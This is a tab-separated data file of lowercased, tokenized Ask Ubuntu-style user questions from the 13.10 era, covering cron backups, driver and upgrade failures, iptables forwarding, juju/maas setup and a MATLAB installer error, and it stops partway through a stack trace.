365660	cron wo n't execute if am not logged in	i have a cron that makes a backup of mysql , if i execute on shell it works pretty well even if i 'm logged when cron supposed to execute works fine , but if i 'm not logged just wo n't execute , i do n't know what could happened , any suggestion ? crontab 00 04 * * * /home/administrador/scripts/respaldo.sh respaldo.sh # ! /bin/sh mysql -uroot -p [ pass ] ccs < /home/administrador/scripts/limpia.sql mysqldump -uroot -p [ pass ] -- routines ccs > /home/administrador/backups/backup_ $ ( date + % y % m % d ) .sql mysqlcheck -uroot -p [ pass ] -- auto-repair -- optimize ccs cd /home/administrador/backups/ tar -zcf backup_ $ ( date + % y % m % d ) .tgz backup_ $ ( date + % y % m % d ) .sql rm backup_ $ ( date + % y % m % d ) .sql find -name '*.tgz ' -type f -mtime +90 -exec rm -f { } \ ; respaldo.sh has execute permission
365666	unity menu very slow and unresponsive	i have a hp g62 laptop with intel pentium processor and ati graphics . since upgrade to ubuntu 13.10 , my unity menu is very slow and unresponsive . i am using proprietary driver for my graphics for example , i 'm switching between gimp and chrome . when i switch to gimp , i will be stuck with chrome menu at the top of the screen . it is really annoying and it is just one of many bugs that came up with 13.10 . any ideas ? should i just revert to default driver ?
365668	unable to upgrade from 13.04 to 13.10	following is what i get as error error during update a problem occurred during the update . this is usually some sort of network problem , please check your network connection and retry . w : failed to fetch http : //bg.archive.ubuntu.com/ubuntu/dists/natty-backports/main/source/sources 404 not found , w : failed to fetch http : //bg.archive.ubuntu.com/ubuntu/dists/natty-backports/restricted/source/sources 404 not found , w : failed to fetch http : //bg.archive.ubuntu.com/ubuntu/dists/natty-backports/universe/source/sources 404 not found , w : failed to fetch http : //bg.archive.ubuntu.com/ubuntu/dists/natty-backports/multiverse/source/sources 404 not found , e : some index files failed to download . they have been ignored , or old ones used instead . restoring original system state i am using command line do-release-upgrade i have changed my dns to google public dns and verified that using nslookup and host -v i could not find bg.archive.ubuntu.com in any of the source list files . in another tab i have ping google running just to verify that network is not down . network has no issues .
365670	garbled screen after return from suspend 13.10	configuration : asus motherboard m2n68 w/onboard nvidia geoforce 7025 and nforce630a chipset . i 've tried the nouveau driver , and nvidia 304,173 . everything works great with nvidia except return from suspend . nouveau gives intermittent problems with screen breaking up . this has been a problem for the past several ubuntu releases . any thoughts -- -thanks
365671	should i put ubuntu , kubuntu , or lubuntu on my powerpc mac ?	i own an imac g4 computer , and i was wondering which form of ubuntu would work best ? i was going to go with ubuntu for ppc , but i heard that there was n't going to be any more os 's ported to ppc and for the os 's ported to it , even the ones supported on intel ( 12.04 lts ) , were not going to get any more updates . then i found that kubuntu and lubuntu are still getting ppc os porting 's and regularly updated . also , would kubuntu or lubuntu be any different to use than ubuntu or are they not a big learning curve ? if you guys can let me know what to install or give me a hint in the right direction and let me know if ubuntu for ppc is still getting os porting 's or the os 's already on it are still supported update wise , that would be great .
365672	software center wo n't take into account my changed openid name : any idea ?	failing to install intellij from the software center , i realized my login is wrong in the /etc/apt/auth.conf entry that the install process generates . in this file , i see my original openid , that 's the one which got automatically generated when signing up on launchpad . it contains my last name so i changed it . i purged conf and binaries for ubuntu one , reinstalled , deleted all listed `` devices '' from app , all `` applications '' from launchpad . deleted ~/.cache/software-center/ , reboot , but still : when installing intellij , the auth.conf file receives my original openid , not the modified one problem is that the commercial subscription , for intellij private ppa , uses my modified openid , so authentication attempt fails . i ca n't remove nor modify this subscription , even by changing back my openid into launchpad . any idea to solve this ?
365673	iptables udp portforwarding	i asked a question before a few days , but i forget to say i want to redirect udp ports . sorry for that i send this question newly but it is important for me . the question is the same but only with udp ports : i want to forward the traffic from 85.25.47.11:9999 [ udp ] ( linux ) to 62.75.130.241:9987 [ udp ] you can see the ip is different . is it possible to forward it in this way ? regards peter
365675	backup/export contacts from ubuntu touch ( official launch r100 , ubuntu 13.10 - armhf ( 20131017 ) )	i flashed my nexus 4 with ubuntu touch official 13.10 release . i wanted to flash it back to android and test the functionality on some things in android to make sure my phone hardware is n't a problem and then flash back to ubuntu touch . i 've added a few dozen contacts already though so i 'm wondering how i can back those up in some way that i do n't have to manually add them again when i put ubuntu touch back on the phone . i 've searched online and seen this code for syncing contacts from google : adb shell sudo -u phablet -i syncevolution -- configure -- sync-property `` username=email @ gmail.com '' -- sync-property `` password=xxxxxxx '' google_contacts and this code for downloading them from google address book : adb shell sudo -u phablet -i syncevolution -- sync one-way-from-server google_contacts addressbook i was thinking maybe something like : adb shell sudo -u phablet -i syncevolution -- sync one-way-to-server google_contacts addressbook might send the contacts from my ubuntu phone to the google address book and then use the one-way-from-server code when i reinstall . would this be correct ? thanks .
365678	how to copy faster to flash device ?	i am using a flash drive and my usb 's filesystem is fat . it is very slow while copy files or paste files into it . in windows i can do these operation much faster using teracopy software . is there any packages or any commands to do these operation much faster in linux ?
365680	failed grub installation	today , i installed ubuntu along with my preinstalled windows8 on lenovo y580 . at the end of installation this messasge popped up saying that grub installation failed . after this i installed easy bcd ( http : //neosmart.net/easybcd/ i use this also on my pc where i use win7 with ubuntu ) . the problem i got is - because of choosing installation along with win8 i dont know where ubuntu is installed so i cant boot it even when using easy bcd . what should i do now ? lucia
365682	depends on lib32gcc1 , libc6-i386 , ca n't install neither	i tried to install catalyst for my radeon graphics on 13.10 , but looks like everything went wrong . now i ca n't install any software , and the software center says : the following packages have unmet dependencies : fglrx : depends : libqtcore4 ( > = 4:4.5.3 ) but 4:4.8.4+dfsg-0ubuntu18 is installed depends : lib32gcc1 but it is not installed depends : libc6-i386 but it is not installed xserver-xorg-video-intel : depends : xorg-video-abi-13 but it is not installed i am a noob , thus i really do n't know what to do . i tried to install lib32gcc1 and libc6-i386 via apt-get and it didn '' t work also for unmet dependecies . i downloaded .deb package of libc6-i386 but i could n't install it . any help ?
365685	ca n't extract .tar.xz archive on 13.10 because permission denied	i used to have ubuntu 13.04 , and also i had installed vlc 2.1.0 with a .tar.xz archive on that , but after the release of 13.10 , i removed 13.04 and installed 13.10 , so i tried to install vlc 2.1.0 from the normal ppa : sudo add-apt-repository ppa : videolan/stable-daily sudo apt-get update sudo apt-get install vlc browser-plugin-vlc ... but it installed vlc 2.0.9 for me , so i removed that and tried to install vlc the way i had installed it before on ubuntu 13.04 : wget -c download.videolan.org/pub/videolan/vlc/2.1.0/vlc-2.1.0.tar.xz tar -xjvf download.videolan.org/pub/videolan/vlc/2.1.0/vlc-2.1.0.tar.xz cd vlc-2.1.0 sudo apt-get build-dep vlc ./configure make sudo make install ... but suddenly an error occurred while extracting the .tar.xz file : error setting owner : operation not permitted , but the owner of file is me and i changed the all the file 's permissions in file properties to read and write , but it does n't work , so what can i do ? and also if it does n't work , suggest a good way to install vlc 2.1.0 !
365686	13.10 saucy login issues ; black screen , loop , and freeze	once upgraded to 13.10 i was not able to get past the login screen . i had the black screen . also ; i can not log on with low graphics mode from recovery either . it makes no difference if i try default graphics driver or not . then after running sudo install -f from recovery root prompt i got a login loop . i have purged fglrx , fglrx-legacy , and nvidia-current . i updated my repository with xorg-edgers and reinstalled nvidia-current . now it semi-freezes at the login screen when i try to log on as my normal user . i say 'semi ' because i can still use my mouse to click on the upper right hand ubuntu logo and shut down or restart the pc . i still can not log on with my user name , but i can through the guest login . while logged in as guest i added a new user account with administrative privileges . i can log into this account without problem and from here am able to see that my .dmrc file in my original account reads : [ desktop ] session=xbmc i have changed 'session=xbmc ' to 'session=ubuntu ' and rebooted , but to no avail . the file resets itself and makes a backup of my changes . any help would be greatly appreciated .
365687	format a pc with a grub error	i have a pc with a grub error { caused by deleting ubuntu partition in xp dual boot } i would like to format the hard disk and install a new os [ chromium ] i do not have either the ubuntu or the xp installation drives although i do have the chromium bootable drive when i try to boot from the chrome bootable usb its says `` your system is repairing itself '' and restarts . this keeps happening over and over again . i just want to format my hdd completely and start over with chromium ( i have no important data on the hdd )
365689	chromium/chrome tabs crashes on ubuntu/edubuntu 12.04.3	for some reason the tabs of chromium and chrome have started to crash ( he 's dead jim ) when running on ubuntu or edubuntu 12.04.3 . it seems to happen only when i log in . i tried the browsers on ubuntu 13.10 and everything worked fine . any suggestions ? ps . the browser does n't crash , just the tabs , and i can open new ones ( but they also crash after a while ) . here 's the output command free on the terminal after a tab crash : total used free shared buffers cached mem : 2041116 1722740 318376 0 2868 267256 -/+ buffers/cache : 1452616 588500 swap : 2085884 104 2085780 compared to the output before the crash : total used free shared buffers cached mem : 2041116 1967108 74008 0 14632 253036 -/+ buffers/cache : 1699440 341676 swap : 2085884 40 2085844
365691	( guide ) how to install and configure mariadb on ubuntu 12.10+	first of all open terminal and type this sudo apt-get install python-software-properties i recommend you to use mariadb version 10.0.4 alpha because when im installed it i 've got no errors compare with 5.5 version . 2 : put this commands in terminal sudo apt-get install software-properties-common sudo apt-key adv -- recv-keys -- keyserver hkp : //keyserver.ubuntu.com:80 0xcbcb082a1bb943db sudo add-apt-repository 'deb http : //download.nus.edu.sg/mirror/mariadb/repo/10.0/ubuntu quantal main' if you 're using other version please change the `` quantal '' to your ubuntu version codename eg : 13.10 saucy 13.04 raring 12.10 quantal ( im using this version ) 12.04 precise` 3 : type in this commands sudo apt-get update sudo apt-get install mariadb-server 4 : after finished installed mariadb you need to run this sudo mysql_install_db sudo /usr/bin/mysql_secure_installation if have problem consider look at the end of this post for solution 5 : you 're done ! ! problems solving in step 3 if you get problem , like unmet dependencies , go to /etc/apt/preferences.d then create new file called `` mariadb '' then , consider to put the below code in the mariadb file that you just created package : * pin : origin < mirror-domain > pin-priority : 1000 in step 4 you may get 2 errors first occur when you run sudo mysql_install_db solution : open another terminal and do this killall mysqld 2.second eror may occur when you running sudo /usr/bin/mysql_secure_installationcommand solution : try doing this cd /etc/init.d and try run ./mysqld start if ./mysqld doesnt exists use ./mysql start as in my case that 's all thank you for reading . i wrote this based on my experience installing this.any errors you get community here can help you if i cant..tq .
365692	ubuntu 13.10 radeon.dpm=1	does radeon power management work out of the box on ubuntu 13.10 by putting radon.dpm=1 on the kernel boot parameters or do i need also to update the firmware files ?
365693	step by step : remove/sideline preinstalled windows 8 , install ubuntu	i want ubuntu as my primary/only operating system . computer came with presumptive pre-installed windows 8 . ( touch screen ) help . new dell inspiron 15r . can not install ubuntu 12.04-03 or lts . i need/request step by step instructions to remove windows 8 or sideline windows 8 . ( ie ) bios settings i need to know : what to have ; what settings ; when to apply ; boot manager settings . uefi . etc . this should be easy , but i am mired in the herpes that is microsoft . i end up having a presumed dual boot that will not access ubuntu . ( ie ) step 1 : turn on computer . step 2 : f # to change ... to ... at dell prompt ... i want to use ubuntu as my primary operating system or my only operating system .
365694	how to install package requirements gtk+-3.0 > = 3.9.10 , glib-2.0 > = 2.37.5 and gio-2.0 > = 2.30.0	i am trying to compile disk usage analyzer . in preparing to compile , i am informed of certain requirements that are not present : configure : error : package requirements ( gtk+-3.0 > = 3.9.10 glib-2.0 > = 2.37.5 gio-2.0 > = 2.30.0 ) were not met : requested 'gtk+-3.0 > = 3.9.10 ' but version of gtk+ is 3.8.4 could you point me in the right direction on how to install these prerequisites ? thanks !
365698	slip interface does n't send datagrams to upper layers	i 'm testing an ipv6 stack implementation for embedded systems . my embedded plaform is connected to an ubuntu 13.04 machine through rs232 over usb . to test the stack , i 'm trying to ping the platform using its link-local address , everything over a slip link . the embedded platform link-local address is fe80 : :aafb:3dff : fe7f : ede . to create the slip interface i did : $ slattach -s 115200 -p slip /dev/ttyacm0 then , i set the interface 's mtu and the link-local address ( static one ) : $ ifconfig sl0 mtu 1280 $ ifconfig sl0 add fe80 : :1/64 $ ifconfig sl0 up everything is ok ( apparently ) : $ ifconfig sl0 sl0 link encap : serial line ip inet6 addr : fe80 : :1/64 scope : link up pointopoint running noarp multicast mtu:1280 metric:1 rx packets:110 errors:0 dropped:0 overruns:0 frame:0 tx packets:18 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:10 rx bytes:4608 ( 4.6 kb ) tx bytes:1760 ( 1.7 kb ) to get the sl0 interface dump : $ tcpdump -l -i sl0 -xx tcpdump : warning : sl0 : no ipv4 address assigned tcpdump : verbose output suppressed , use -v or -vv for full protocol decode listening on sl0 , link-type raw ( raw ip ) , capture size 65535 bytes then i used ping6 : $ ping6 -l -i sl0 -c 1 fe80 : :aafb:3dff : fe7f : ede ping fe80 : :aafb:3dff : fe7f : ede ( fe80 : :aafb:3dff : fe7f : ede ) from fe80 : :1 sl0 : 56 data bytes -- - fe80 : :aafb:3dff : fe7f : ede ping statistics -- - 1 packets transmitted , 0 received , 100 % packet loss , time 0ms the output from tcpdump is : 11:35:37.773403 ip6 fe80 : :1 > fe80 : :aafb:3dff : fe7f : ede : icmp6 , echo request , seq 1 , length 64 0x0000 : 6000 0000 0040 3a40 fe80 0000 0000 0000 ` ... . @ : @ ... ... .. 0x0010 : 0000 0000 0000 0001 fe80 0000 0000 0000 ... ... ... ... ... . 0x0020 : aafb 3dff fe7f 0ede 8000 8187 182d 0001 ..= ... ... ... .-.. 0x0030 : b981 6a52 0000 0000 04cd 0b00 0000 0000 ..jr ... ... ... ... 0x0040 : 1011 1213 1415 1617 1819 1a1b 1c1d 1e1f ... ... ... ... ... . 0x0050 : 2021 2223 2425 2627 2829 2a2b 2c2d 2e2f . ! `` # $ % & ' ( ) *+ , -./ 0x0060 : 3031 3233 3435 3637 01234567 11:35:37.798177 ip6 fe80 : :aafb:3dff : fe7f : ede > fe80 : :1 : icmp6 , echo reply , seq 1 , length 64 0x0000 : 6000 0000 0040 3a40 fe80 0000 0000 0000 ` ... . @ : @ ... ... .. 0x0010 : aafb 3dff fe7f 0ede fe80 0000 0000 0000 ..= ... ... ... ... . 0x0020 : 0000 0000 0000 0001 8100 8087 182d 0001 ... ... ... ... .-.. 0x0030 : b981 6a52 0000 0000 04cd 0b00 0000 0000 ..jr ... ... ... ... 0x0040 : 1011 1213 1415 1617 1819 1a1b 1c1d 1e1f ... ... ... ... ... . 0x0050 : 2021 2223 2425 2627 2829 2a2b 2c2d 2e2f . ! `` # $ % & ' ( ) *+ , -./ 0x0060 : 3031 3233 3435 3637 01234567 which means that the embedded platform correctly sends echo reply and the sl0 interface received it . but for some reason , sl0 did n't send it to the application . i got similar results when i ping the all-nodes multicast address ff02 : :1 . my ubuntu host can ping another linux machine using its local-link address through eth0 interface . so , the problem seems to be in the sl0 interface . how can i fix this ?
365703	artifacting with virtualbox 4.3 seamless mode and windows 8.1 guest	host os is xubuntu 12.10 . when i try to run windows 8.1 in virtualbox 4.3 , i 'm getting some artifacting at the top of the screen ( the orange is from the background image in the vm ) : is there any way to eliminate this ?
365705	could not initialize the package information the package manager	i get the following error message : an unresolvable problem occurred while initializing the package information . please report this bug against the 'update-manager ' package and include the following error message : 'e : invalid record in the preferences file /etc/apt/preferences.d/kolab , no package header' h content of /etc/apt/preferences.d/kolab : pin : origin mirror.kolabsys.com pin-priority : 501
365708	kernel panic on live cd boot	this happens pre-dm loading after booting an integrity-checked saucy live cd . no peripherals . is anyone able to suggest anything ? photo of the output : the tails live cd works fine , so i 'm presuming it 's not a hardware fault .
365710	difficulty in installing dia diagram editor	the dia diagram editor is available in my ubuntu software center but it is requiring for a password.what will be the password ?
365712	ubuntu server 12.04 lost internet connection after changing static ip	so , weâ´re setting up an ubuntu 12.04 lts server at my office , and had it nice and running with our static ip . however , when we tried changing the ip for another one ( just changing the /etc/network/interfaces file ) , we lost internet connection . when we tried to return to the previous ip , the problem persisted . here 's the mentioned file : auto lo iface lo inet loopback auto eth0 iface eth0 inet static address 195.0.64.13 # this one is the ip that worked before netmask 255.255.255.0 network 195.0.64.0 broadcast 195.0.64.255 gateway 195.0.64.1 dns-nameservers 200.54.144.227 200.54.0.10 if i do an ifconfig , eth0 looks fine , but rx packets are all in 0 , same as tx packets
365713	should making a new disk for wubi be fast ?	should making a new wubi disk take a very long time ? i am currently following along to the steps in this answer for increasing the root partition space for my ubuntu wubi install : increase size of root partition after installing ubuntu in windows the current size of my root is 30 gb . i am trying to make a new disk with 400 gb , so i ran the following command : /host/ubuntu/disks # dd if=/dev/zero of=new.disk bs=1mb count=400000 it 's been running for the last 20 minutes , so i 'm a little worried something may have gone afoul , but it could be working fine . should creating this partition take a long time since it 's large ? this is n't even the formatting step , so i figured it would be fast , but i could definitely be wrong . edit : the disk i am doing this on is two 1 tb drives in a raid 1 , with the following space : root @ ubuntu : /home/jsage8 # df -h /host filesystem size used avail use % mounted on /dev/sdc1 932g 259g 674g 28 % /host edit : this has now been running for over an hour . i 'm hesitant to kill it in the middle though as i 'm not sure what type of ramifications that might have ?
365714	about ubuntu `` system testing ''	i have a question . i want to do a full hardware diagnostic on my pc and test every piece of hardware possible . so i was wondering what hardware components does 'system testing ' app cover . are all hardware components detected and tested individually ? thank you .
365716	gnome terminal scrollbar visibility	according the manual below https : //help.gnome.org/users/gnome-terminal/stable/pref-scrolling.html.en there is an option ( edit â¸ profile preferences â¸ scrolling ) `` scrollbar visibility '' so that you can choose from the following options : always visible : scrollbar is visible at all times . visible only when necessary : scrollbar is visible only when terminal output exceeds the length of terminal window size . hidden : scrollbar is always hidden from view . but in ubuntu 12.04 ( i removed unity so the scrollbar is the old style ) , there is no such option . the scrollbar is always shown even i did n't type anything . how to change this , please .
365719	i have to restart lightdm after run	after starting the system , i 've a black screen ( without any screen backlight ) , then i have to switch to tty6 ( ctrl+alt+f6 ) , login and restart the lightdm : sudo service lightdm restart i 'm using xfce .
365722	remmina remote control : black screen after xbmc exit	i have a htpc ( quietpc sidewinder fanless media pc ) running ubuntu 12.04 and autostarting xbmc frodo . i 'm remote controlling this machine using my laptop also running ubuntu 12.04 and using remmina vnc as a client . everything works perfectly as long as xbmc is running on the server : i can see the server screen and control it via mouse and keyboard on the laptop ( client ) . however , when xbmc is stopped on the htpc ( server ) , my tv shows the ubuntu desktop normally , but the screen on the laptop ( client ) turns black . i 'm however still controlling the htpc with the laptop since i can see the arrow moving upon laptop mouse movement , and i can still type text in the htpc . oddly , when the screensaver on the htpc kicks in , i again have a visual on the laptop . anyone any thoughts on this ? what should i do to maintain visual after stopping xbmc ? any suggestions much appreciated . thanks !
365724	juju remove units stuck in dying state so i can start over ?	i have machines running on maas using juju . some of them failed to deploy because a hook did n't run because of an ( invalid ) setting i set in the config . in the jju ui , i tried marking them as resolved , and then trying to remove them ( and repeated through a few cycles of them going green and and then red ) . ( i believe doing resolve + remove will make juju not get stuck on the fact that the hook did n't work , and let juju just get rid of the machine . ) now i have units that seem stuck and say agent-state : error agent-state-info : 'hook failed : `` install '' ' agent-version : 1.16.0.1 life : dying in juju status . i 've tried destroying the units and the machines they are on . is there any way to just give up on those units and recycle the machines the are on for another try ? i also tried marking the units resolved on the command line , but i 'm getting conflicting messages . i get error can not set resolved mode for unit `` ceph-osd/1 '' : already resolved when i tried to mark it resolved , but status says the same error message above after that when i run juju status agent-state : error agent-state-info : 'hook failed : `` install '' ' life : dying update : i just came back after an hour or two , and found that one of the units i was having trouble with went away . so , waiting did work .
365726	compiz annotate plugin choppy/tearing	is there a way to get rid of the tearing/choppiness in the compiz annotate plugin and make it more smooth ? i am using ubuntu 13.04 and compiz 0.9.9.0 . see screenshot .
365728	error change icon theme in gnome-shell	good afternoon . ubuntu 13.04 . gnome-shell by default . in the system for a long time i did not change , just do install the software update . earlier is always the theme of icons was faenza . at one point , after rebooting the computer icons came off topic . now , through no gnome settings or through ubuntu tweaker i can not change it . any change of this parameter has no effect at all , default gnome icons are displayed by default and all . anyone know how to fix it ? reinstall gnome-shell already tried .
365730	repackaging an installed application with libraries included	i have a package installed in ubuntu-13.10 , called `` gpiv '' , which is not available for fedora , which i use in my lab for some unavoidable reasons . but , i want to use the gpiv software on fedora also . is is possible to repackage the installed gpiv executable as a tar ball , which also include all the linked libraries that the gpiv utilizes when it runs on ubuntu . the idea is to extract the tar ball on fedora and run the executable without installing . since the tar ball already contains all the required libraries , it should run on fedora too . i remember about one such utility , but forgot the details . i did google check also , but no use . if anyone has some idea , please let me know . it would indeed be very helpful . will the superdeb creator serve the purpose ?
365732	help with mu argentina on 13.10 with playonlinux and wine	i am having problems with installing mu argentina on ubuntu 13.10 . i have already installed wine 1.6 , and direct x9 through playonlinux but i ca n't execute it correctly . when i try to run it two different things appear ( not at the same time ) : `` secureengine driver can not be updated because there are some programs using it . you need to close or restart . '' and something about a oreans.sys driver . i have also checked wine 's website and mu argentina has the platinum category ( the best one ) , but i am not sure if this version is the same one i have . mine is the latest available on mu argentina 's website . thanks four your answers .
365734	juju and error environment has no access-key or secret-key	following the official guide : [ 1 ] https : //juju.ubuntu.com/docs/config-maas.html and considered that i 've generated the ssh key ( added it to ui of maas ) and the api key , my environments.yaml file presents in this way : environments : maas : type : maas maas-server : 'http : //x.x.x.x/maas/' maas-oauth : 'ndpa86psezs7bfynsy : vqjlkyhujbvyzbty5q : sxxxxxxxxxxxxxxxxxxxxxx admin-secret : 'nothing' default-series : precise authorized-keys-path : ~/.ssh/id_rsa.pub # or any file you want . when i try to run the command : juju bootstrap receive the following error : error environment has no access-key or secret-key someone can explain me where is the wrong ? maas and juju are installed using their ppa stable on an ubuntu 12.04.3 server i 've already enlisted 2 machines on my maas and they are in commissioning status in the environments.yaml file the line `` default '' has as value `` maas ''
365735	13.10 saucy login issues since update from 13.04 - boots in to text mode	i tried updating from 13.04 to 13.10 , it upgraded with errors . i 'm not sure of the errors it faced while updating . i have nvidia nvs 300 graphics card . on reboot my system stuck on splash screen . no recovery options or older kernel attempts succeed . edited grub to bypass plymouth and have text based screen . it boots well on text based screen . tried updating grub and fixing configuration files with dpkg but all fails . hal was creating issues . i removed hal . and removed pid file once . update : system passes splash screen but boots into text mode after failure of gdm and lightgdm . i have installed nvidia-current . any further solutions ?
365738	driver does not see second display , nvidia nvs 5400 thinkpad t430 at ubuntu 12.04	if i go settings- > displays i can see 2 monitors . same if i run in console xrandr xrandr screen 0 : minimum 8 x 8 , current 1600 x 900 , maximum 16384 x 16384 lvds-0 connected 1600x900+0+0 ( normal left inverted right x axis y axis ) 309mm x 174mm 1600x900 60.0*+ 40.0 1440x900 59.9 1360x768 59.8 60.0 1152x864 60.0 1024x768 120.1 60.0 960x720 120.0 928x696 120.1 896x672 120.0 960x600 120.0 960x540 120.0 800x600 120.0 60.3 56.2 840x525 120.0 119.8 800x512 120.3 700x525 120.0 640x512 120.0 720x450 119.8 640x480 120.0 59.9 680x384 119.6 119.9 576x432 120.1 512x384 120.0 400x300 120.6 112.7 320x240 120.1 vga-0 connected ( normal left inverted right x axis y axis ) 1280x1024 60.0 + 75.0 1280x960 60.0 1152x864 75.0 1024x768 75.1 70.1 60.0 832x624 74.6 800x600 72.2 75.0 60.3 56.2 640x480 72.8 75.0 66.7 60.0 720x400 70.1 this is my /etc/x11/xorg.conf # warning : this file is autogenerated by nvidia-prime . all changes to this file will be lost . section `` serverlayout '' identifier `` layout '' screen 0 `` nvidia '' inactive `` intel '' endsection section `` device '' identifier `` nvidia '' driver `` nvidia '' busid `` 1:0:0 '' endsection section `` screen '' identifier `` nvidia '' device `` nvidia '' # uncomment this line if your computer has no display devices connected to # the nvidia gpu . leave it commented if you have display devices # connected to the nvidia gpu that you would like to use . option `` usedisplaydevice '' `` none '' endsection section `` device '' identifier `` intel '' driver `` modesetting '' endsection on the other hand if i try to configure displays and go to nvidia x server settings , second monitor is not visible at all . i have installed recommended nvidia driver via system settings- > additional drivers , which as i believe are official ones . any ideas ?
365740	wireless related issues on hp machine	there was an install fest recently in my college and the iso that was distributed was a customized version of 12.04.3 now , the iso works fine on machines by acer and lenovo , however the hp machines , specifically the probook 4440s , is not able to connect to the wifi . infact , the dropdown menu for connections has no enable wireless option . additonally , the machine has a button to enable wireless connections and that button is constantly orange ie , it is disabled , however upon booting into win8 , it is enabled . how can this be solved ? issue of missing drivers ?
365742	changes to .o files after compiling	i have built a custom kernel and i am able to do my system call , but now i want to change the logic in the .o file reference in the makefile obj-y += sys_calls_test.o the sys_calls_test.o has # include < linux/linkage.h > asmlinakge long sys_hello ( void ) { printk ( `` hello '' ) ; } i modified it to # include < linux/linkage.h > asmlinakge long sys_hello ( void ) { printk ( `` testing this block '' ) ; } when i try to recompile my sys_calls_test.c file the changes are not showing up i used gcc file_name.c -o testing_comp ./testing_comp my sys_calls_test.c file that i have referenced in the kernel 's makefile . # include < stdio.h > # include < linux/unistd.h > # include < sys/syscall.h > # define sys_hello 349 int main ( void ) { int c = syscall ( sys_hello , a , b ) ; printf ( `` system call returned % d\n '' , c ) ; return 0 ; } i am still seeing `` hello there '' and not `` testing this block '' can someone point me if i have to recompile the linux source and why my changes are not showing up . should i need to use the make command and rebuild the entire kernel source to show this change since i have changed the .o reference in the kernel 's makefile thanks a lot
365743	how to create a ubuntu wiki page ?	i 'm currently writing a blueprint for the trusty vuds ( first uds for me ) and there is in launchpad the optional field to link to an ubuntu wiki page for longer specification , but seriously - it 's not the first time . i ca n't figure out how to create a new wiki page . i do n't even know how to navigate the wiki , there is no visual indicator or button i could press .
365744	installing matlab on ubuntu 12.04 32 bits	i have been trying to install matlab2012a , matlab2012b and matlab2013a for like 4 hours , triedto fix my prospective errors regarding the posts 2012a , ubuntu-matlab documentation and matlab-central . but either i am recieving an error while the installation gui pops-up with the error : the application encountered an unexpected error and needs to close . you may want to try re-installing your product ( s ) . more information can be found at /tmp/mathworks_amir.log on the other hand for 2012a . and the errors for 2012b and 2013a is : `installing ... exception in thread `` main '' com.google.inject.provisionexception : guice provision errors : 1 ) error in custom provider , java.lang.runtimeexception : java.lang.reflect.invocationtargetexception at com.mathworks.wizard.wizardmodule.providedisplayproperties ( wizardmodule.java:60 ) while locating com.mathworks.instutil.displayproperties at com.mathworks.wizard.ui.components.componentsmodule.providepaintstrategy ( componentsmodule.java:76 ) while locating com.mathworks.wizard.ui.components.paintstrategy for parameter 4 at com.mathworks.wizard.ui.components.swingcomponentfactoryimpl. < init > ( swingcomponentfactoryimpl.java:110 ) while locating com.mathworks.wizard.ui.components.swingcomponentfactoryimpl while locating com.mathworks.wizard.ui.components.swingcomponentfactory for parameter 1 at com.mathworks.wizard.ui.wizarduiimpl. < init > ( wizarduiimpl.java:65 ) while locating com.mathworks.wizard.ui.wizarduiimpl while locating com.mathworks.wizard.ui.wizardui annotated with @ com.google.inject.name.named ( value=basewizardui ) at com.mathworks.wizard.ui.uimodule.providewizardui ( uimodule.java:50 ) while locating com.mathworks.wizard.ui.wizardui for parameter 0 at com.mathworks.wizard.exceptionhandlerimpl. < init > ( exceptionhandlerimpl.java:22 ) while locating com.mathworks.wizard.exceptionhandlerimpl while locating com.mathworks.wizard.exceptionhandler 1 error at com.google.inject.injectorimpl $ 4.get ( injectorimpl.java:767 ) at com.google.inject.injectorimpl.getinstance ( injectorimpl.java:793 ) at com.mathworks.wizard.wizardlauncher.startwizard ( wizardlauncher.java:160 ) at com.mathworks.wizard.wizardlauncher.start ( wizardlauncher.java:75 ) at com.mathworks.wizard.abstractlauncher.launch ( abstractlauncher.java:27 ) at com.mathworks.wizard.abstractlauncher.launchstandalone ( abstractlauncher.java:18 ) at com.mathworks.professionalinstaller.launcher.main ( launcher.java:21 ) caused by : java.lang.runtimeexception : java.lang.reflect.invocationtargetexception at com.google.inject.internal.providermethod.get ( providermethod.java:106 ) at com.google.inject.internalfactorytoprovideradapter.get ( internalfactorytoprovideradapter.java:48 ) at com.google.inject.injectorimpl $ 4 $ 1.call ( injectorimpl.java:758 ) at com.google.inject.injectorimpl.callincontext ( injectorimpl.java:811 ) at com.google.inject.injectorimpl $ 4.get ( injectorimpl.java:754 ) at com.google.inject.spi.providerlookup $ 1.get ( providerlookup.java:89 ) at com.google.inject.spi.providerlookup $ 1.get ( providerlookup.java:89 ) at com.google.inject.internal.providermethod.get ( providermethod.java:95 ) at com.google.inject.internalfactorytoprovideradapter.get ( internalfactorytoprovideradapter.java:48 ) at com.google.inject.singleparameterinjector.inject ( singleparameterinjector.java:42 ) at com.google.inject.singleparameterinjector.getall ( singleparameterinjector.java:66 ) at com.google.inject.constructorinjector.construct ( constructorinjector.java:84 ) at com.google.inject.constructorbindingimpl $ factory.get ( constructorbindingimpl.java:111 ) at com.google.inject.factoryproxy.get ( factoryproxy.java:56 ) at com.google.inject.singleparameterinjector.inject ( singleparameterinjector.java:42 ) at com.google.inject.singleparameterinjector.getall ( singleparameterinjector.java:66 ) at com.google.inject.constructorinjector.construct ( constructorinjector.java:84 ) at com.google.inject.constructorbindingimpl $ factory.get ( constructorbindingimpl.java:111 ) at com.google.inject.factoryproxy.get ( factoryproxy.java:56 ) at com.google.inject.providertointernalfactoryadapter $ 1.call ( providertointernalfactoryadapter.java:45 ) at com.google.inject.injectorimpl.callincontext ( injectorimpl.java:811 ) at com.google.inject.providertointernalfactoryadapter.get ( providertointernalfactoryadapter.java:42 ) at com.google.inject.scopes $ 1 $ 1.get ( scopes.java:54 ) at com.google.inject.internalfactorytoprovideradapter.get ( internalfactorytoprovideradapter.java:48 ) at com.google.inject.injectorimpl $ 4 $ 1.call ( injectorimpl.java:758 ) at com.google.inject.injectorimpl.callincontext ( injectorimpl.java:811 ) at com.google.inject.injectorimpl $ 4.get ( injectorimpl.java:754 ) at com.google.inject.spi.providerlookup $ 1.get ( providerlookup.java:89 ) at com.google.inject.spi.providerlookup $ 1.get ( providerlookup.java:89 ) at com.google.inject.internal.providermethod.get ( providermethod.java:95 ) at com.google.inject.internalfactorytoprovideradapter.get ( internalfactorytoprovideradapter.java:48 ) at com.google.inject.providertointernalfactoryadapter $ 1.call ( providertointernalfactoryadapter.java:45 ) at com.google.inject.injectorimpl.callincontext ( injectorimpl.java:811 ) at com.google.inject.providertointernalfactoryadapter.get ( providertointernalfactoryadapter.java:42 ) at com.google.inject.scopes $ 1 $ 1.get ( scopes.java:54 ) at com.google.inject.internalfactorytoprovideradapter.get ( 